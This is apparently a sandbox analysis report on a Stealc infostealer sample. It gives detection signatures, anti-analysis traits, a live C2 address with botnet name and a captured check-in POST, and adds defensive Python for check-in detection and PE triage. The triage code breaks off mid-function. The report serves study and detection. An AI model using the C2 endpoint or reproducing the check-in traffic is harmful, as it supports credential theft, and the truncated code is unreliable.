
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540473
MD5: 1d63962fa977f6d304646bb056c59d16
SHA1: 7a7b2a8425fa3e601de7f51c6e3377b7f641d3e9
SHA256: b6f0f7c28a9b15f590c9a327464d2d562603fcbf246f03399cdc1234007d85e7
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1D63962FA977F6D304646BB056C59D16)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development builds on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers (sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll), then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (source | rule | description | author)
  dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
  00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  Process Memory Space: file.exe PID: 6488 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  Process Memory Space: file.exe PID: 6488 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
  4.2.file.exe.80000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata alerts (timestamp | SID | severity | classtype | source | destination | protocol)
  2024-10-23T20:04:11.651073+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7:49700 | 185.215.113.37:80 | TCP


                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 4.2.file.exe.80000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00087240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00089AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00089B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00098EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49700 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
  GET / HTTP/1.1
  Host: 185.215.113.37
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
  POST /e2b1563c6670f193.php HTTP/1.1
  Content-Type: multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB
  Host: 185.215.113.37
  Content-Length: 211
  Connection: Keep-Alive
  Cache-Control: no-cache
  Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 44 44 30 33 36 34 35 42 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 2d 2d 0d 0a
  Data Ascii:
    ------GDHIDHIEGIIIECAKEBFB
    Content-Disposition: form-data; name="hwid"

    30DD03645BFB4109353171
    ------GDHIDHIEGIIIECAKEBFB
    Content-Disposition: form-data; name="build"

    doma
    ------GDHIDHIEGIIIECAKEBFB--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (7 occurrences)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00084880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 with the same headers and the same 211-byte multipart body (hwid, build) as the POST listed above
Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)G
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1G
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php4
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpUG
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpyGD
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/h
Source: file.exe, 00000004.00000002.1339731462.0000000000D49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37t
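The captured POST above is the whole of Stealc's first contact in this run: a request to the .php endpoint from the extracted configuration, no User-Agent header (the "HTTP GET or POST without a user agent" signature), and a multipart body carrying only a hardware ID (hwid) and a build name (build, here "doma", the same value the configuration extractor reports as "Botnet"). The following Python is an added example, not part of the Joe Sandbox report or of the Stealc code: it re-types the 211-byte body from the hex dump above as a constructed byte string, parses the multipart fields, and applies a heuristic built only from the traits visible on this page (POST to a .php path, no User-Agent, exactly the fields hwid and build, hwid an upper-case hex string). The heuristic illustrates what a network detection could key on; it is not a reproduction of Suricata rule 2044243, whose content is not on this page. CHECKIN_HEADERS, the 8-character minimum for hwid and the function names are assumptions of mine.

```python
import re
from typing import Dict

# Boundary string taken from the Content-Type header of the captured POST on this page.
BOUNDARY = b"----GDHIDHIEGIIIECAKEBFB"

# Constructed: the 211-byte request body, re-typed from the report's "Data Raw" hex dump
# so this runs offline. CRLF line endings are part of the wire format.
CHECKIN_BODY = (
    b"------GDHIDHIEGIIIECAKEBFB\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"30DD03645BFB4109353171\r\n"
    b"------GDHIDHIEGIIIECAKEBFB\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"doma\r\n"
    b"------GDHIDHIEGIIIECAKEBFB--\r\n"
)

# Constructed: the request headers as listed on the page. Note: no User-Agent.
CHECKIN_HEADERS = {
    "Content-Type": "multipart/form-data; boundary=----GDHIDHIEGIIIECAKEBFB",
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}


def boundary_from_content_type(content_type: str) -> bytes:
    """Pull the boundary parameter out of a multipart Content-Type value."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        raise ValueError("no multipart boundary in Content-Type")
    return m.group(1).encode("ascii")


def parse_multipart(body: bytes, boundary: bytes) -> Dict[str, bytes]:
    """Minimal multipart/form-data parser: {field name: raw value}.

    On the wire each part is introduced by CRLF "--" boundary CRLF; the CRLF in
    front of a delimiter belongs to the delimiter, not to the preceding value.
    """
    delimiter = b"--" + boundary
    fields: Dict[str, bytes] = {}
    for chunk in body.split(delimiter)[1:]:        # [0] is the (empty) preamble
        if chunk.startswith(b"--"):                 # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        headers, sep, value = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue                                # malformed part without a header/body split
        if value.endswith(b"\r\n"):
            value = value[:-2]
        m = re.search(rb'name="([^"]*)"', headers)
        if m:
            fields[m.group(1).decode("ascii", "replace")] = value
    return fields


def looks_like_stealc_checkin(method: str, path: str, headers: Dict[str, str], body: bytes) -> bool:
    """Heuristic from the traits visible in this report (assumption: tune before deploying):
    POST to a .php path, no User-Agent, multipart body with exactly hwid + build, hex hwid."""
    if method != "POST" or not path.endswith(".php"):
        return False
    if any(k.lower() == "user-agent" for k in headers):
        return False
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if not ctype.startswith("multipart/form-data"):
        return False
    fields = parse_multipart(body, boundary_from_content_type(ctype))
    if set(fields) != {"hwid", "build"}:
        return False
    return re.fullmatch(rb"[0-9A-F]{8,}", fields["hwid"]) is not None


if __name__ == "__main__":
    print(parse_multipart(CHECKIN_BODY, BOUNDARY))
    print(looks_like_stealc_checkin("POST", "/e2b1563c6670f193.php", CHECKIN_HEADERS, CHECKIN_BODY))
```

Two practical caveats: the hwid is what the C2 keys the victim on, so it is worth extracting into the case record along with the build name, and a heuristic this narrow is easy for the operator to break (adding a User-Agent or a third field defeats it), which is why IDS rules of this kind are normally paired with the C2 address and URI from the extracted configuration.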

                System Summary

Source: file.exe | Static PE information: section name: (not printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (not printable)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004129EE
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00391A57
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004532E1
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_003B7B5F
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00368B94
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044E390
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00321BCC
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004FCC55
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00454DDA
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0040FDF1
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044B5FC
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00437EC1
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0039A6BA
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0035DEA7
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00449EDB
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00305F2D
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00447F6C
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004517DF
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 000845C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: zdqimryq ZLIB complexity 0.9947830924578867
Source: file.exe, 00000004.00000003.1298921959.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00099600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00093720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\VYV19CV8.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe | String found in binary or memory: /addW|R#
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1827840 > 1048576
Source: file.exe | Static PE information: Raw size of zdqimryq is bigger than: 0x100000 < 0x198200

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 4.2.file.exe.80000.0.unpack :EW;.rsrc :W;.idata :W; :EW;zdqimryq:EW;aqqapoae:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;zdqimryq:EW;aqqapoae:EW;.taggant:EW; (E = execute, W = write, R = read; the first, unnamed section is ER on disk but EW in the dumped image, which is the section-rights change the "Detected unpacking" signature keys on)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00099860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c43c2 should be: 0x1c92c1
Source: file.exe | Static PE information: section name: (not printable)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (not printable)
Source: file.exe | Static PE information: section name: zdqimryq
Source: file.exe | Static PE information: section name: aqqapoae
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_003C583C push ebx; mov dword ptr [esp], eax (at 4_2_003C589E)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00508040 push ebp; mov dword ptr [esp], eax (at 4_2_00508045)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00508040 push edi; mov dword ptr [esp], edx (at 4_2_0050807C)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004D586B push ebx; mov dword ptr [esp], esi (at 4_2_004D589E)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0009B035 push ecx; ret (at 4_2_0009B048)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004E381F push 2A179F55h; mov dword ptr [esp], eax (at 4_2_004E386D)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004E381F push 72FEBC6Dh; mov dword ptr [esp], eax (at 4_2_004E38B3)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004E301C push 2ACBD5B8h; mov dword ptr [esp], eax (at 4_2_004E3045)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004E301C push 714E1BB3h; mov dword ptr [esp], edx (at 4_2_004E305F)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004FE01A push ebx; mov dword ptr [esp], edx (at 4_2_004FE01E)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00539023 push 1C3AE1EFh; mov dword ptr [esp], edi (at 4_2_0053906E)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004D3035 push 116C456Dh; mov dword ptr [esp], eax (at 4_2_004D3054)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004D3035 push eax; mov dword ptr [esp], esi (at 4_2_004D3091)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004CF037 push ebx; mov dword ptr [esp], edx (at 4_2_004CF041)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004CF037 push 2E6173DFh; mov dword ptr [esp], ecx (at 4_2_004CF074)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004CF037 push eax; mov dword ptr [esp], ecx (at 4_2_004CF098)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_005200D1 push 50A3D610h; mov dword ptr [esp], ebp (at 4_2_0052013D)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_004FB8C3 push edi; mov dword ptr [esp], esp (at 4_2_004FB8E1)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_005310DE push ebx; mov dword ptr [esp], edx (at 4_2_00531106)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_005310DE push ecx; mov dword ptr [esp], edx (at 4_2_005311B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push edi; mov dword ptr [esp], ebx (at 4_2_0044C8EB)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push 5AB05420h; mov dword ptr [esp], edi (at 4_2_0044CA0D)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push 0EEFC66Eh; mov dword ptr [esp], eax (at 4_2_0044CA2F)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push edi; mov dword ptr [esp], edx (at 4_2_0044CA9B)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push 39380A10h; mov dword ptr [esp], ebx (at 4_2_0044CAC4)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push ebp; mov dword ptr [esp], 039E887Bh (at 4_2_0044CAD0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push ecx; mov dword ptr [esp], esi (at 4_2_0044CAF3)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push ecx; mov dword ptr [esp], edx (at 4_2_0044CB12)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push 48D25A82h; mov dword ptr [esp], esi (at 4_2_0044CB66)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push ebp; mov dword ptr [esp], 5BDA3B90h (at 4_2_0044CB6D)
Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0044C8D2 push 328B56C1h; mov dword ptr [esp], esi (at 4_2_0044CBCB)
Source: file.exe | Static PE information: section name: zdqimryq entropy: 7.953415844862702
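The static findings in this section (a stored checksum of 0x1c43c2 where the file contents give 0x1c92c1, an entry point inside .taggant, sections named zdqimryq and aqqapoae, and 7.95 bits per byte of entropy in zdqimryq) are the usual fingerprint of a packed executable, and each can be reproduced without a sandbox. The Python below is an added example, not code from the report or from any tool it names: it parses just enough of the PE headers to locate the section table, the entry point and the CheckSum field, recomputes the checksum with the algorithm Windows' imagehlp uses, measures per-section Shannon entropy (the report's "ZLIB complexity" is a compression-ratio proxy for the same property), and flags the same conditions. Because the sample itself is not on the page, the block builds a constructed minimal PE32 with the same shape (code in .text, a maximal-entropy blob in zdqimryq, entry point in .taggant, the report's stored checksum); build_sample_pe, STANDARD_SECTIONS and the 7.0-bit threshold are assumptions of mine.

```python
import math
import struct
from typing import List

# Assumption: names a normal linker emits; anything else deserves a look.
STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT"}


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniform; packed data sits near 8."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """PE CheckSum as imagehlp computes it: sum 32-bit words with end-around carry,
    skipping the CheckSum field itself, fold to 16 bits, then add the file length."""
    total = 0
    padded = data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def parse_pe(data: bytes) -> dict:
    """Just enough of the PE32/PE32+ headers to reason about sections and the checksum."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                 # optional header: AddressOfEntryPoint +16, CheckSum +64
    sections = []
    for i in range(nsections):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "rawsize": rawsize, "rawptr": rawptr})
    return {"entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "checksum_offset": opt + 64, "sections": sections}


def triage(data: bytes) -> List[str]:
    """The static checks this report flags, as one-line findings."""
    pe = parse_pe(data)
    findings = []
    computed = pe_checksum(data, pe["checksum_offset"])
    if pe["checksum"] not in (0, computed):   # 0 means "never set"; the loader accepts that
        findings.append(f"invalid checksum: real {pe['checksum']:#x} should be {computed:#x}")
    entry_section = None
    for s in pe["sections"]:
        if s["va"] <= pe["entry_rva"] < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']!r}")
        ent = shannon_entropy(data[s["rawptr"]:s["rawptr"] + s["rawsize"]])
        if ent > 7.0:                          # assumption: "probably packed" threshold
            findings.append(f"section {s['name']!r} entropy {ent:.2f}: likely packed")
    if entry_section not in STANDARD_SECTIONS:
        findings.append(f"entry point lies outside standard sections: {entry_section!r}")
    return findings


def fix_checksum(data: bytes) -> bytes:
    """Patch the CheckSum field with the value the file contents actually give."""
    off = parse_pe(data)["checksum_offset"]
    return data[:off] + struct.pack("<I", pe_checksum(data, off)) + data[off + 4:]


def build_sample_pe(sections, entry_rva: int, stored_checksum: int) -> bytes:
    """Constructed: a minimal PE32 image (headers plus raw sections), not loadable,
    only structurally sufficient for the checks above."""
    opt = bytearray(224)                       # PE32 optional header
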